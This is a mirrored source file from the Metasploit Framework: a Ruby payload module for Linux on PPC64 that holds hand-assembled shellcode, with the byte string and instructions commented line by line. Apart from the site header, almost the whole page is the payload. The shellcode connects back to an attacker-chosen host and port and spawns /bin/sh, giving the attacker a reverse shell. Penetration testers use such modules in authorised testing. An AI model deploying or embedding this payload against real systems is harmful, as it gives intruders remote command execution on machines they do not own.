CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
Views: 11780
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
7
module MetasploitModule
8
9
CachedSize = 183
10
11
include Msf::Payload::Single
12
include Msf::Payload::Linux
13
include Msf::Sessions::CommandShellOptions
14
15
def initialize(info = {})
16
super(merge_info(info,
17
'Name' => 'Linux Command Shell, Reverse TCP Inline',
18
'Description' => 'Connect back to attacker and spawn a command shell',
19
'Author' => 'Ramon de C Valle',
20
'License' => MSF_LICENSE,
21
'Platform' => 'linux',
22
'Arch' => [ ARCH_PPC64, ARCH_CBEA64 ],
23
'Handler' => Msf::Handler::ReverseTcp,
24
'Session' => Msf::Sessions::CommandShellUnix,
25
'Payload' =>
26
{
27
'Offsets' =>
28
{
29
'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ],
30
'LPORT' => [ 62, 'n' ],
31
},
32
'Payload' =>
33
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
34
"\x3b\xa0\x01\xff" + # li r29,511 #
35
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
36
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
37
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
38
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
39
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
40
"\x7c\x24\x0b\x78" + # mr r4,r1 #
41
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
42
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
43
"\x44\xff\xff\x02" + # sc #
44
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
45
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
46
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
47
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
48
"\x3a\xc0\x04\xd2" + # li r22,1234 #
49
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
50
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
51
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
52
"\x7c\x35\x0b\x78" + # mr r21,r1 #
53
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
54
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
55
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
56
"\x7c\x24\x0b\x78" + # mr r4,r1 #
57
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
58
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
59
"\x44\xff\xff\x02" + # sc #
60
"\x7f\x64\xdb\x78" + # mr r4,r27 #
61
"\x7f\x43\xd3\x78" + # mr r3,r26 #
62
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
63
"\x44\xff\xff\x02" + # sc #
64
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
65
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
66
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
67
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
68
"\x7f\xc8\x02\xa6" + # mflr r30 #
69
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
70
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
71
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
72
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
73
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
74
"\x7c\x24\x0b\x78" + # mr r4,r1 #
75
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
76
"\x44\xff\xff\x02" + # sc #
77
"/bin/sh"
78
}
79
))
80
end
81
end
82
83